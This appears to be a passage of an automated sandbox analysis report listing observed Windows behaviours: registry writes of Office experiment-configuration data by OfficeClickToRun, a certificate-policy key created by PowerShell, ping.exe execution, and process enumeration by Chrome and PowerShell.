Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 = 6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e5175657279496d70726f76656d656e74732e45434c4d756c746953656c656374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e436f6d62696e654261636b656e6444696d656e73696f6e436f6d6d616e6473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e4c6963656e73654665617475726573456e61626c65644f72436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4175674c6f6f702e576f726b666c6f7744697361626c65642e5265706c6163654f626a656374576f726b666c6f77222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4358452e48696464656e466f6e74734d736f466f6e745069636b657257696e3332222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e416c6c6f7753657456616c756573576974686f7574457863656c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4368616e6765476174652e46436c6561724d6f6e696b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e436f6c6c656374536861706550726f7073427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e4d6170436861727459656c6c6f7744617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e5069766f744368617274496e7665727446696c6c427567466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e43686172742e536c69646553686f7748696465546f6f6c74697073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d61785265747279436f756e74222c20225622203a2022696e7433325f747c313422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070564d6178526574727954696d654c696d6974222c20225622203a2022696e7433325f747c363030303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e417070565265747279496e74657276616c222c20225622203a2022696e7433325f747c3230303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655265666163746f72656453687574646f776e50726f636573736573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734164646f6e222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e557064617465427573696e657373222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e436c69636b3252756e2e5573655465616d734f6e55706461746550726f506c7573222c20225622203a20227374643a3a77737472696e677c656e61626c656422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e4164646974696f6e616c4461746154797065456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b466565646261636b457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e426c6f636b537572766579457870657269656e636542617365644f6e5072697661637953657474696e6773222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e436f686572656e6365457870657269656e6365456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e446961676e6f73746963735341532e55706c6f6164657254797065222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e456e61626c65466565646261636b5632536368656d61222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e466565646261636b446973616d626967756174696f6e53637265656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564466565646261636b5461736b50616e65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e486f73746564537572766579456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e437573746f6d6572566f6963652e536173466565646261636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446961676e6f73746963732e44697361626c654661737446696c746572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c654361706163697479222c20225622203a2022696e7433325f747c313022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e414354522e5468726f74746c65496e74657276616c4d736563222c20225622203a2022696e7433325f747c3130303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4261636b7374616765496e6170704e61765632456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e49735265706c7954696d657374616d704c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e4e657743617264426f7264657273222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e4a53476174652e50616e65546162466f6375734669786573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d6f6465726e436f6d6d656e74732e50726f636573734368616e676573496e766f6b65456c7365506f7374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4d736f2e4f757453706163652e446570726563617465536574496d6167654173796e63222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f666669636553746172742e466978466f7241444f33393032343239222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4368616e6765476174652e4f757453706163652e536861726564576974684d652e44697361626c65446f63756d656e74735265717565737449665573696e674167674d7275222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e436865636b41637469766974794c6f67546f456e61626c654d656e74696f6e73222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e456e61626c655369746573467269656e646c7950617468222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f72794c6567616379436c65616e7570456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486973746f7279556e696f6e466978456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e486f6d65506167652e436f6c6c61707369626c65536c616273222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e496e4170704e61762e43726561746552656e616d6544656c657465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4d736f2e4f666669636553746172742e466978466f7241444f333838363036375632222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e4f44656c74612e53747265616d4d6f6465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e446f63732e576f7069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e4361636865457870697279496e4d696e222c20225622203a2022696e7433325f747c37323022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e666967496444656c696d69746572496e4c6f67222c20225622203a20227374643a3a77737472696e677c3b22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e436f6e6669674c6f67546172676574222c20225622203a20227374643a3a77737472696e677c64656661756c7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e44697361626c65436f6e6669674c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4543532e456e61626c65536d61727445546167222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e454353546573742e746573747661726961626c65222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c65436f6d706c65785069766f745461626c65496e5069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c655069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e5069766f745461626c655265636f6d6d656e64657252616e6b65725632222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e4e616d656453686565745669657750657273697374656e6365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e436f6e66696746657463684d616e61676572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e44796e616d6963447069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e457870466972737453657373696f6e5461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e4665617475726551756572794c6f676765722e456e61626c655374617469634c6f6767696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e5472696d41707049644c697374546f4665746368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e416c7761797346616c6c6261636b466f7253796e634261636b6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e44657072656361746546696c65536572766572496e666f54797065222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e456e61626c654261636b67726f756e6455706c6f6164222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e5573654e65774d736f446f6354656c656d65747279496e697450617468222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436865636b5265766973696f6e53747265616d457175616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f6c6c616250726f7053746f726543616368655265736574436865636b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f7079546f43616c6c6261636b456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4373694c696d6974656446616c6c6261636b546f486c696e6b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44534c49422e456e61626c654c6162656c73556e757365644f72436c6561726564436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446570726563617465436865636b5374617274735769746846696c654e616d65457869737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973616d626967756174654373694e6574776f726b436f6e6e65637469766974794572726f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f52657472795374726174656779222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f5374726963744d6f6465456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446f63732e4d736f2e4f757473706163652e496e6974436163686546726f6d464948222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4472675570646174655265666572656e63657353796368726f6e6f7573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44796e616d6963467261676d656e7453697a65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e456e61626c65466f726365486f73744d6f6465466f7253796e634261636b6564486f73744f6e4f70656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4661696c43616c6c73546f5472616e73616374656453747265616d446174614265666f72654373694c6f616446696c65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4872446f776e6c6f616454656d704173796e634c4d54222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e496e637265617365644279746573427566666572657257696e646f7753697a65222c C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|3" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.5 = 207b205c224576656e74466c61675c22203a2032207d2c205c224544502a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22536861726564436f6d6d656e74735c22203a207b205c224576656e74735c22203a207b205c22436f6d6d6974436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744e61746976655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22447261667453746174654d616e61676572456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f737444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465506f7374416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245324550657266547261636b65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224472616674436172644d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244726166744361726452656e64657265645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d61726b436f6d6d656e744372656174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656f70656e546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265736f6c7665546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172745265706c79506f737465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224162616e646f6e44726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d6d656e74436f6e746578744368616e676564416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164436f6d6d656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436c6f7365566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6e74657874437265617465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684f70656e566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368566965774368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368426567696e44726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684361706162696c69746965734368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e74734368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e7453656c65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368437265617465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368446f634368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e64436f6d6d656e7453657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e6444726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368466f63757350616e655472696767657265644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e6974436f6d6d656e7453657373696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e697469616c52656e646572436f6d706c657465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e76616c69644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684c6f6164546872656164735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65466f63757353746174654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65546f52656e6465724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853656c656374436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853657448616c6650616e65446973706c61794d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463685468656d654368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636844656c657465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c656172436f6d6d656e7453656c656374696f6e416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e74416374697669746965735c22203a207b205c224576656e74735c22203a207b205c2241637469766974794c6f6744697363617264466f72446f63756d656e744368616e67655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67547269676765724173796e635461736b576f726b65725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654c6f61644173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e697446696c65506174685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565417070656e644173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565577269746541637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756552656d6f76654173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655772697465446f63756d656e74496e666f4865616465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756554727944656c657465456d70747946696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e7365727441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e717565756541637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674372656174654c6f675c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67536176654e657746696c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654c6f63616c4e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e674e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224170694f70656e41637469766974794c6f675769746853747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674361636865446f63756d656e74496e666f5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e74727946696e616c697a655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6746696c7465724f757443757272656e7455736572416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674c6f616446726f6d53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6753617665546f53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565436865636b5265766f6b65644544505c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565526570616972436f7272757074656446696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674d6f64696679436c6f6e655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c654f70656e4572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c65526561644572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c655265706c6163654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c6557726974654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655472756e6361746551756575655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e7472794372656174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e74727953657453746174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536572766963654163746976697479526573756c745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674f6e436f6e74656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e717565756541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d69745175657565496e7365727441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d697451756575654469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d6974517565756548656c706572456e737572654469726563746f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d697451756575654d616e61676572437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241706943726561746541637469766974794c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224170694372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637469766974794c6f674173796e635461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c6162436f726e65725c22203a207b205c224576656e74735c22203a207b205c22436f617574686f725570646174654c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f617574686f72476f546f43757272656e744c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795573657252655265676973746572436f6e6e65637469766974794368616e67654e6f7469667949664e65636573736172795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e6443686174427574746f6e497356697369626c654e6f7744617461706f696e745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572436c6f736553696e676c65466c796f75745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64497343686174417661696c61626c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665644173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72734265666f72654173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279496e6974464d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279436f617574686f72577261707065725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64436f61757468696e6757697468416c6c4775657374734f724d697373696e67456d61696c456469746f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22476f546f4c6f636174696f6e416374696f6e487562416374696f6e4a756d70546f417574686f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465417574686f724c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465456d61696c416e64436861745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6e7461637443617264416374696f6e487562416374696f6e53686f77436f6e74616374436172645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279557365724a756d70546f417574686f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279557365724f70656e53696e676c65466c796f75745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22456d61696c416374696f6e487562416374696f6e53656e64456d61696c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e6453657456616c75655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224d736f494d5365727669636573536642506861736531496d70726f7665 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
